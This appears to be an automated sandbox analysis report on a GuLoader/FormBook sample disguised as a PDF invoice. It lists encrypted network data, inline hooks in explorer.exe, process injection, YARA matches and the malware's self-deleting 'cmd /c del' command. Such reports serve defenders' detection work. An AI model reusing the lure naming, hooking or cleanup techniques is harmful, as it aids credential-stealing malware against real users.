e7 01 e7 15 15 c6 c1 dc 3c 3e c6 fd 62 0e 7b 04 Data Ascii: n*WcEXt&'W7b6k[vK6,GVHV{iBG2?r?^RD3c6_;aY7NQz,E!u'U 3OyYV(Ixwi(a,evj 5p7+e{o]m@Glb<>b{
2021-11-24 14:07:32 UTC	179	IN	Data Raw: 7a 55 de 9b 03 4f 24 3a d4 f2 86 89 1a fd 0d 07 e9 04 3d 45 e0 3e ba 13 ff 48 a1 6d ea 9f bb 7a 2b 2b d9 aa ad 29 37 7d be 98 d3 1f 97 89 73 9b a5 06 90 33 41 88 f6 22 1b f4 03 88 82 12 75 8f 0a 55 6f c9 13 18 f4 3e 89 d2 4b 79 0a 03 4f f3 c8 80 c4 05 88 81 f2 54 96 a6 8d c4 f1 f3 75 b9 33 6a 83 62 87 b8 42 7c 88 3f cb 12 f6 2c 45 c8 e8 17 7e 7c 0d 27 0b c4 37 07 f0 e8 17 d4 b0 bc 95 2e d7 7a 1a 8e 0d 64 08 a3 bb ee cb e4 c1 d5 d1 0d ab 89 61 d2 4f 90 14 1c 31 4b 31 b8 66 4e d2 96 4b 73 b1 c9 36 26 54 91 ce 4c 84 00 aa 4f 02 97 ad 84 98 cf 55 4e d3 ea 4a 40 07 8a 52 eb 0f 40 ab f2 fd 3d fc 40 3a 98 13 aa 3d c2 0b 0b d6 19 a3 40 9b 2a 35 a1 35 11 b6 59 c6 8e b0 41 4b f4 8c aa a4 fe dc 84 a6 ca f4 ba 15 15 93 e9 57 09 23 92 6e f1 c9 71 de cb 8c 25 c2 64 35 Data Ascii: zUO$:=E>Hmz++)7}s3A"uUo>KyOTu3jbB\|?,E~\|'7.zdaO1K1fNKs6&TLOUNJ@R@=@:=@*55YAKW#nq%d5
2021-11-24 14:07:32 UTC	180	IN	Data Raw: 43 d4 ec d9 16 ad 4e 77 2a dd de f6 98 16 a5 bc 61 c5 fb d6 6d f8 a2 24 74 94 73 b3 09 15 af 92 1f a5 5c 89 0d 5a 41 dc 4b 4c ae 41 6f ca 0f 7d 58 93 46 82 a7 b3 f6 a2 3d 6e 39 24 56 06 3b 91 fa 6d 30 ba d6 e0 76 23 19 ec c6 51 cc 33 0a 66 c5 97 06 ba 8c 2f 09 57 a4 06 a4 9b a6 93 2b 97 f5 3c 41 d3 68 dc 61 55 46 ff a4 54 0a 08 d4 37 48 a7 a6 a1 36 10 af c1 75 37 69 45 2b 1a 83 8f 24 f7 5b 92 af e8 9d 1a bf 01 0b 44 57 b3 ec 8f b9 fe 70 cc 0e 75 e9 4e c3 ca e4 4c f0 b1 2a 76 84 e1 b5 c3 76 96 37 1b bc ae e0 04 6c 8c 6b ed db 86 3a bf 06 f6 e5 df a0 4d bb 8d dc 15 dd 07 54 70 9e 0e 8b 79 2f d4 9c 9d 23 0c e9 f5 05 a4 f9 70 e6 5a 42 05 e7 9b e1 00 b9 77 74 32 13 b2 e8 84 23 e8 09 90 05 b2 06 1f 47 80 17 ac 87 2d c7 46 2b 3b ef f1 bb 10 70 d7 ce 60 a7 5e 0f Data Ascii: CNwam$ts\ZAKLAo}XF=n9$V;m0v#Q3f/W+<AhaUFT7H6u7iE+$[DWpuNLvv7lk:MTpy/#pZBwt2#G-F+;p`^
2021-11-24 14:07:32 UTC	182	IN	Data Raw: dc 02 61 9e 28 83 26 55 f1 c2 e3 7d ee b3 6a 81 3b 5e cd c0 16 f0 a3 ad 8e 01 2e 29 6b e3 c2 f4 9f b9 f2 d5 b8 af 86 35 bb 71 70 03 f0 c6 4f df 46 c0 99 58 50 41 d9 1f 63 65 d6 90 f6 0e d3 14 58 65 6d bb 90 ad ae 90 8f 3d b3 76 df 07 e6 66 4e 86 d2 79 86 25 d4 44 57 68 b6 d4 66 7c 23 c3 7f a0 9b 67 70 96 b8 9a 9a c8 a5 ca 5b 60 95 6a f9 cd 60 7c 6c 90 1b ca 05 ca 09 c9 37 78 03 ae be 65 f8 2f 9a 83 f4 ea f8 f3 a7 41 c8 f3 ab 0e 2c fa 75 22 92 43 0f e6 29 4e 98 9b f4 14 be fd 73 36 40 8b 25 7a 49 5f 18 78 33 d6 79 6a 42 ff 6e ec f9 b9 48 03 4b 39 15 87 8a 00 36 9d 65 3e 0b 9b 5d 9c 44 98 d1 3b 73 dd f6 c9 f8 fc 7c b2 1f ea 35 e2 ce ad ab 7b 23 ae 0f 86 1a 6d 18 3b fc 47 6b 7b 91 7c 57 0c e6 a1 a2 16 27 72 a0 cf 20 09 e0 e5 1e 99 a0 6f c6 61 8d 30 47 25 0b Data Ascii: a(&U}j;^.)k5qpOFXPAceXem=vfNy%DWhf\|#gp[`j`\|l7xe/A,u"C)Ns6@%zI_x3yjBnHK96e>]D;s\|5{#m;Gk{\|W'r oa0G%
2021-11-24 14:07:32 UTC	183	IN	Data Raw: d2 d9 46 73 b2 55 66 e5 06 48 1b 2e f8 03 5d b7 83 16 19 44 53 45 1e b2 49 be 2d d4 71 4c 5e 93 e3 c8 72 57 04 af 8f da d9 d3 d6 48 81 83 6e ee ba ca a7 73 d2 ab 34 2a 89 04 21 a5 a7 d6 79 05 d4 a2 41 af 9b ff f0 9d 88 1c 0f 03 c5 e4 b7 ce 13 51 0f 44 22 1a 47 8c 6c 62 77 ac 92 53 ac 96 dd 36 9e f4 81 68 89 bd 17 ed 3c 88 28 02 8d 4c 15 fb df 55 4d 1f 39 fa a4 9b de 73 9d a5 40 ec 80 68 34 92 f8 7c fc 72 11 23 8e 61 47 c3 c8 6d 82 d7 36 e8 78 dc dc a0 36 b0 c8 2b 2a f7 8e ea b9 ac 37 91 2e a6 4d aa 17 45 3b e2 96 d6 00 bc 57 2f 31 94 f3 3b e1 b2 f5 35 50 9f 47 c4 f3 b3 63 21 43 a6 a3 2f f1 47 78 98 db 94 9b a9 8f 95 a1 62 d8 81 24 17 b1 44 19 17 ac 0a fa 77 1d 69 86 68 ab 33 6f 0a 4d 55 3f db 2d 51 68 5c ee c0 6a 80 d5 b4 2b dd 52 8f 84 b1 c1 4c d7 e3 17 Data Ascii: FsUfH.]DSEI-qL^rWHns4!yAQD"GlbwS6h<(LUM9s@h4\|r#aGm6x6+7.ME;W/1;5PGc!C/Gxb$Dwih3oMU?-Qh\j+RL
2021-11-24 14:07:32 UTC	184	IN	Data Raw: 32 24 8c 67 4b 33 f0 c5 53 22 f3 f8 b5 78 65 65 0c f3 13 16 13 52 eb 7d 47 b4 a5 c9 1d 95 be 85 10 38 e7 ca 06 4e 21 e3 1e 9a bc a2 f6 0c 13 0d b5 7b f0 5b 23 c2 bc 6d e4 6c c7 ad 12 22 fa d5 4c 4d 94 10 d4 1a 92 55 5a f1 98 46 1d 30 1f 3c 59 f4 4a e0 ba df bd cc 61 f6 5d 68 bc 88 04 27 18 12 13 ee 1e d1 29 9e c6 74 60 f1 41 ff 02 45 c1 d1 88 74 8b c9 f4 6c 80 64 5e cd f5 c9 da 4b 30 7e d2 d2 12 a8 c9 c5 62 25 0d d4 2e 05 cb 41 cf f9 de 77 fc fd 09 06 4d 22 23 cc 67 e8 fd 99 3d f9 c2 0b 6e 70 fc ba 3d 58 96 b4 16 a0 2f b0 08 f3 a2 31 bb fb a2 2f c1 b5 8f 7b c6 ef 79 8c 42 02 59 f0 df 2c d3 1b 1e b1 6a a0 8d 53 da 9e da 1d e2 ca 6c c1 ec 04 8e f1 b5 50 0a dd 01 be 7c ec 12 e3 4d 8f 3c 9f 0f b3 f5 86 5c f0 d3 51 44 37 d9 c6 22 f1 a3 b4 a7 c3 5d d3 a2 b1 38 Data Ascii: 2$gK3S"xeeR}G8N!{[#ml"LMUZF0<YJa]h')t`AEtld^K0~b%.AwM"#g=np=X/1/{yBY,jSlP\|M<\QD7"]8
2021-11-24 14:07:32 UTC	186	IN	Data Raw: ec 68 9e 79 81 b8 d2 18 6d a2 47 ab 72 14 6b 8f 59 f7 86 fe 46 5f 75 49 b9 34 46 b7 42 aa 96 c5 47 ee 7f 3f b4 54 34 59 64 d5 48 fd c4 5f ba be 39 96 58 af f5 4b fb 03 9a dc 24 86 16 af df f7 d7 37 d8 0e ad b7 fe 4f 52 0a 86 ba b9 96 f8 a5 2f fa 40 71 2e 10 53 7f 2d 47 67 d5 93 60 a8 3f 7d 12 50 c8 24 f5 47 94 a4 ef 4b a1 75 5e 6c 9f 77 ed c7 d0 a2 29 a0 90 86 22 21 0d f4 eb 2a 51 12 63 c8 4c d5 e7 b4 14 01 99 ab 7e 91 7e 80 f1 d2 ef 08 09 01 e6 8d 1c b0 29 f7 12 3e 8e 0f c1 50 5e 63 ec cb e1 56 96 61 a8 ca 4c 4e a2 f8 62 40 11 28 b1 ae ca 29 2c 9a 39 fd 4a aa d3 3d 2e eb b0 64 c7 58 39 e9 b2 ff d5 45 e7 6d e2 61 99 6f bc f8 49 1e 8c ac 5d f6 38 91 8a 15 46 ad 3b 40 fa c4 aa 6f 49 be 28 ff 76 f3 63 f9 2d 31 86 6f e5 a2 ce 47 6f 0d 57 ef 05 05 e1 35 94 6e Data Ascii: hymGrkYF_uI4FBG?T4YdH_9XK$7OR/@q.S-Gg`?}P$GKu^lw)"!*QcL~~)>P^cVaLNb@(),9J=.dX9EmaoI]8F;@oI(vc-1oGoW5n
2021-11-24 14:07:32 UTC	187	IN	Data Raw: 96 83 21 ef 0e 68 4c 7f f3 a6 cd b8 77 96 07 36 87 49 0e 41 b6 aa b5 67 9b e1 65 aa ca b0 93 9f c0 35 d6 8c f0 d1 62 d5 e0 1c fb 88 d5 3d 54 f0 f0 b7 63 ce 0f 6f e0 98 03 95 64 90 e5 e8 18 2c a2 66 11 ab 6b 25 aa 34 67 54 0d ce 07 7b 96 9f ba b2 15 51 2e 74 00 ab e6 01 cb d3 e7 86 f5 e9 b1 6e 5d 08 54 55 d7 cd a9 98 57 86 08 70 dd 3b 23 d7 27 5d 76 c9 f8 35 a4 23 9c e0 28 4d ee ca 3e 7a 9a c6 ea 48 10 c6 f4 fb 7e 9e 64 42 5b 8c 4c ec fe 52 61 d9 8f 39 1e b1 9f a3 3e 81 23 ea 6d 11 9b 2e 89 30 ca 03 64 01 da ec 29 54 05 3e 75 5a 11 58 b5 ca 29 b6 07 0f 3c 1c ae 11 92 bf cb 6a b2 d9 7a 24 ef ed c6 f3 e3 ae aa 2f 1e 70 85 a8 ef 4e dc d9 84 3d 82 d6 8b a7 8c c9 e8 11 12 5d 8d cd 1e d1 86 59 17 f5 29 27 8c 23 ff 8f 93 91 00 ee 7b 20 7f 8b b7 3c 7e 43 49 7c fa Data Ascii: !hLw6IAge5b=Tcod,fk%4gT{Q.tn]TUWp;#']v5#(M>zH~dB[LRa9>#m.0d)T>uZX)<jz$/pN=]Y)'#{ <~CI\|
2021-11-24 14:07:32 UTC	188	IN	Data Raw: d6 0e 38 d7 f9 f8 a1 4c 7f 3b 20 ab 60 b2 0c b7 cd 50 93 3e b6 cf 91 27 cc 00 3f d1 20 4c d9 3b 9e f6 b0 48 06 37 91 0f b0 76 83 57 4e 30 7b 45 19 bd 11 c9 09 3c b2 10 b5 d7 2f ae 8e bb c5 08 e5 68 9c 22 a4 ba c0 a1 44 82 c8 67 5f 4c 88 c6 3a 62 d0 ee cd 06 d8 5e ff 5b 1d a2 25 e3 90 6c ad 5a 25 02 90 35 96 4c 5a 94 22 9e c3 15 3a de da 29 a1 4b b6 0d 32 0a 4d d8 62 3b 5f dc 86 8b 63 92 4b f3 ce 9d e5 6a a5 f6 a7 21 69 65 d4 e8 fb 2c f4 ef 72 fc e9 35 da 24 fb 58 4a 78 d5 64 f1 3b 93 77 f1 9f fa cc 7a 11 3e 62 1b 30 cf 2c 53 94 fe 1b da 08 17 95 4e e9 2a a1 97 03 ba 98 3e b8 e3 ab 24 75 fa c6 c8 61 a3 c6 88 23 9e 81 2e 50 c9 54 73 a2 3b 65 64 8e 6c d9 67 16 68 30 53 dd 74 b4 e7 d4 39 7b 05 0e e3 16 0b 24 9b 19 d5 72 f3 d5 d1 c1 76 3f 8a 64 bf 61 02 f2 7b Data Ascii: 8L; `P>'? L;H7vWN0{E</h"Dg_L:b^[%lZ%5LZ":)K2Mb;_cKj!ie,r5$XJxd;wz>b0,SN*>$ua#.PTs;edlgh0St9{$rv?da{
2021-11-24 14:07:32 UTC	189	IN	Data Raw: e5 a3 2b 47 d9 2c c6 3c b5 70 30 5c e1 97 dc a9 79 f4 3c 7c fb 83 64 1a 2a 31 97 c1 21 a0 87 d8 4a df 43 08 25 52 c3 4a b9 6d 15 69 cd 89 e3 0e 54 6b 56 dc 6b 05 6d 85 db be 15 37 a3 cb 13 69 ba 51 fa 3b ec 16 40 51 1f de 12 78 e3 9d d0 a0 c7 d4 88 e6 00 fe f9 9b f8 41 91 25 c8 45 35 47 74 5b bd 78 30 59 d3 11 bb db 26 3e 82 b2 1b 0d 5a 2d 59 58 b7 e9 2d 53 20 78 4e 25 e2 4c 1b 5c b5 3e e6 86 59 68 80 63 bf 5a 41 85 e9 24 dc 39 31 fb 48 b1 39 f6 82 a6 b0 37 e1 8d a7 79 0f 25 e8 21 0b 93 f1 36 f1 78 d3 2d bf ba c5 52 1d ed 41 1a ef be 41 e1 da f9 23 1c e5 b4 f8 7a b2 eb e9 5c 6c 3a 47 34 d1 ed 86 b7 7e 50 9a 13 af 78 cf c8 ba 71 b1 74 70 f2 2b 41 49 16 71 2e 1b d4 b9 60 44 0f b3 fc a4 e6 fd d5 ad 41 e3 2c e9 c0 42 59 90 07 94 be bb 69 7a e6 a3 fe 8b e8 5b Data Ascii: +G,<p0\y<\|d*1!JC%RJmiTkVkm7iQ;@QxA%E5Gt[x0Y&>Z-YX-S xN%L\>YhcZA$91H97y%!6x-RAA#z\l:G4~Pxqtp+AIq.`DA,BYiz[
2021-11-24 14:07:32 UTC	191	IN	Data Raw: 0c f2 27 2c 07 ca b0 01 7b d4 aa e3 66 a8 2b 29 5b 1c 5b d0 22 75 0d 68 0e 61 5a 22 61 2a a2 6e 9e 02 9b d8 37 bb be ed ed 0b 14 6b 3b 5b a5 eb a7 90 e3 6c 6a 3f f7 2b 23 08 60 e5 2f cd 31 53 e2 9b 1c 03 92 87 7c ec 7d 38 49 05 8a a5 ae 92 d1 05 f4 f3 25 7f 97 d8 4b a2 84 92 67 6d e2 29 Data Ascii: ',{f+)[["uhaZ"a*n7k;[lj?+#`/1S\|}8I%Kgm)

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x84 0x4E 0xED
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8C 0xCE 0xED
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8C 0xCE 0xED
GetMessageA	INLINE	0x48 0x8B 0xB8 0x84 0x4E 0xED

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Arrival Notice, CIA Awb Inv Form.pdf.exe PID: 4636 Parent PID: 2496

General

Start time:	15:06:15
Start date:	24/11/2021
Path:	C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"
Imagebase:	0x400000
File size:	214328 bytes
MD5 hash:	FF71941571D8930C1125B3931D400D86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.22302999330.0000000002B60000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: Arrival Notice, CIA Awb Inv Form.pdf.exe PID: 7132 Parent PID: 4636

General

Start time:	15:06:58
Start date:	24/11/2021
Path:	C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"
Imagebase:	0x400000
File size:	214328 bytes
MD5 hash:	FF71941571D8930C1125B3931D400D86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000000.22299792619.0000000000560000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 4672 Parent PID: 7132

General

Start time:	15:07:32
Start date:	24/11/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff630d80000
File size:	4849904 bytes
MD5 hash:	5EA66FF5AE5612F921BC9DA23BAC95F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
Reputation:	moderate

Chronological Activities

Analysis Process: NETSTAT.EXE PID: 5904 Parent PID: 4672

General

Start time:	15:07:47
Start date:	24/11/2021
Path:	C:\Windows\SysWOW64\NETSTAT.EXE
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\NETSTAT.EXE
Imagebase:	0x2a0000
File size:	32768 bytes
MD5 hash:	9DB170ED520A6DD57B5AC92EC537368A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, Author: Florian Roth Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Author: Florian Roth Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 3516 Parent PID: 5904

General

Start time:	15:07:51
Start date:	24/11/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"
Imagebase:	0x990000
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 1324 Parent PID: 3516

General

Start time:	15:07:51
Start date:	24/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff694d50000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Arrival Notice, CIA Awb Inv Form.pdf.exe PID: 4636 Parent PID: 2496 Arrival Notice, CIA Awb Inv Form.pdf.exeCOMMON

Executed Functions

Function 02B718FC, Relevance: 14.2, APIs: 2, Strings: 5, Instructions: 1942COMMON

Download Yara Rule

Strings

{ y8, xrefs: 02B6BC68
X4C, xrefs: 02B6B695
z&#+, xrefs: 02B6ACED
7UV, xrefs: 02B6AF73
p!, xrefs: 02B6FA36

Memory Dump Source

Source File: 00000001.00000002.22302999330.0000000002B60000.00000040.00000001.sdmp, Offset: 02B60000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: 7UV$X4C$p!$z&#+${ y8
API String ID: 2706961497-1483765972
Opcode ID: 544deacebcabb823a57a60c955646b9391e498882677bc5c4f079d2679af4fc9
Instruction ID: 60cd54974418da7caaaa89976b9dd8a9c5df7574fe3d54456d9ddb25a05134bc
Opcode Fuzzy Hash: 544deacebcabb823a57a60c955646b9391e498882677bc5c4f079d2679af4fc9
Instruction Fuzzy Hash: 99E29C716043868FDF349E38C9A83EA7BB2EF52350F8541AECCD99B255D3358586CB12

Uniqueness

Uniqueness Score: -1.00%

Function 02B72FF6, Relevance: 13.7, APIs: 2, Strings: 5, Instructions: 1486COMMON

Download Yara Rule

Strings

.JZ, xrefs: 02B73087
{ y8, xrefs: 02B6BC68
X4C, xrefs: 02B6B695
z&#+, xrefs: 02B6ACED
7UV, xrefs: 02B6AF73

Memory Dump Source

Source File: 00000001.00000002.22302999330.0000000002B60000.00000040.00000001.sdmp, Offset: 02B60000, based on PE: false

Yara matches

Similarity

API ID:
String ID: .JZ$7UV$X4C$z&#+${ y8
API String ID: 0-92133663
Opcode ID: bcdab235080556eced2e98e32f9975582ed58c91f25498ef9591eb166071c1f5
Instruction ID: a0ab803665aac786596a9fc5117f2d7b9155815b931ad5d26dedcd6c074ece57
Opcode Fuzzy Hash: bcdab235080556eced2e98e32f9975582ed58c91f25498ef9591eb166071c1f5
Instruction Fuzzy Hash: 08C2677160434ACFDF349E38C9A87EA37B2EF55350F95426ECC8A9B244D7358986CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02B6C7E5, Relevance: 13.4, APIs: 2, Strings: 5, Instructions: 1121fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,-EEE4DD68,BA89F163,9FB60E84,-000000018E77AF75), ref: 02B6C9C6

Strings

SX, xrefs: 02B6C953
{ y8, xrefs: 02B6BC68
X4C, xrefs: 02B6B695
z&#+, xrefs: 02B6ACED
7UV, xrefs: 02B6AF73

Memory Dump Source

Source File: 00000001.00000002.22302999330.0000000002B60000.00000040.00000001.sdmp, Offset: 02B60000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: 7UV$SX$X4C$z&#+${ y8
API String ID: 823142352-1297690872
Opcode ID: 0c93838be0aaaa9534b08d379155c453501ef7d090368743a67686610538ea79
Instruction ID: 2bcf4a2d9191fd3ce43b6236b4fc02410bfac13414e21ecc463c3e0711f0faac
Opcode Fuzzy Hash: 0c93838be0aaaa9534b08d379155c453501ef7d090368743a67686610538ea79
Instruction Fuzzy Hash: D792457160434ADFDF349E38C9A93EA77B3AF55350F95412ECC89AB244D3358A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02B6CC3A, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 194memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(65322A6C), ref: 02B6CEAF

Strings

W, xrefs: 02B6D0B9
{ y8, xrefs: 02B6BC68
X4C, xrefs: 02B6B695
z&#+, xrefs: 02B6ACED
7UV, xrefs: 02B6AF73
p!, xrefs: 02B6FA36

Memory Dump Source

Source File: 00000001.00000002.22302999330.0000000002B60000.00000040.00000001.sdmp, Offset: 02B60000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: 7UV$W$X4C$p!$z&#+${ y8
API String ID: 2167126740-4088983930
Opcode ID: 5891f4f69fde8e7cf6e18693133c9b708be1db67b961d3359b323a1a79ccc384
Instruction ID: b6f7d7b356a88f5d9473facec49a1d14e295526433401af24cef92d4f5eab4e0
Opcode Fuzzy Hash: 5891f4f69fde8e7cf6e18693133c9b708be1db67b961d3359b323a1a79ccc384
Instruction Fuzzy Hash: 6461477670430A9FDB309E78CC683EA7BA2AF56350F91816ECCC59B154D3358A86CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02B70C8F, Relevance: 12.1, APIs: 1, Strings: 5, Instructions: 1555COMMON

Download Yara Rule

Strings

{ y8, xrefs: 02B6BC68
X4C, xrefs: 02B6B695
z&#+, xrefs: 02B6ACED
7UV, xrefs: 02B6AF73
9, xrefs: 02B70E09

Memory Dump Source

Source File: 00000001.00000002.22302999330.0000000002B60000.00000040.00000001.sdmp, Offset: 02B60000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 7UV$9$X4C$z&#+${ y8
API String ID: 0-3445854478
Opcode ID: 5fdefbf5903963c3aa6c4f23f9f218e53a190e36b014fd1a048f5cadae6f540a
Instruction ID: 543e90260df54f364f33c2c6dc6bc168ae1e44dd68003061c01ffe3abd8693f5
Opcode Fuzzy Hash: 5fdefbf5903963c3aa6c4f23f9f218e53a190e36b014fd1a048f5cadae6f540a
Instruction Fuzzy Hash: 6EC2577160434ADFDF349E3889A83EA77B2EF55390F95426ECC899B244D3354A86CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02B6DB02, Relevance: 11.7, APIs: 1, Strings: 5, Instructions: 1208COMMON

Download Yara Rule

Strings

{ y8, xrefs: 02B6BC68
X4C, xrefs: 02B6B695
z&#+, xrefs: 02B6ACED
7UV, xrefs: 02B6AF73
`wv@, xrefs: 02B6DC5B

Memory Dump Source

Source File: 00000001.00000002.22302999330.0000000002B60000.00000040.00000001.sdmp, Offset: 02B60000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 7UV$X4C$`wv@$z&#+${ y8
API String ID: 0-2205955865
Opcode ID: 1d40e111617597d72889f39e060e910356d155373fba71235ee5d04e36fc1ad9
Instruction ID: b37f45cde82bc3e7348aac821b5ae3f8c30562a31baeb570e38e110cc65960e5
Opcode Fuzzy Hash: 1d40e111617597d72889f39e060e910356d155373fba71235ee5d04e36fc1ad9
Instruction Fuzzy Hash: C292547160434A9FDF349E3889A83FA77B3AF55390F95416ECC8A9B244D3398985CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02B6CF85, Relevance: 10.0, APIs: 1, Strings: 4, Instructions: 1282COMMON

Download Yara Rule

Strings

{ y8, xrefs: 02B6BC68
X4C, xrefs: 02B6B695
z&#+, xrefs: 02B6ACED
7UV, xrefs: 02B6AF73

Memory Dump Source

Source File: 00000001.00000002.22302999330.0000000002B60000.00000040.00000001.sdmp, Offset: 02B60000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 7UV$X4C$z&#+${ y8
API String ID: 0-3075175360
Opcode ID: 1af1d756ab03f636a51755aa5e1a6fb2a364682da68a32b922b2149a0b9ced60
Instruction ID: 463fac11f7602222d0badad4fd2e9c3320211043e11c8b18c2c7b4fb87d96a28
Opcode Fuzzy Hash: 1af1d756ab03f636a51755aa5e1a6fb2a364682da68a32b922b2149a0b9ced60
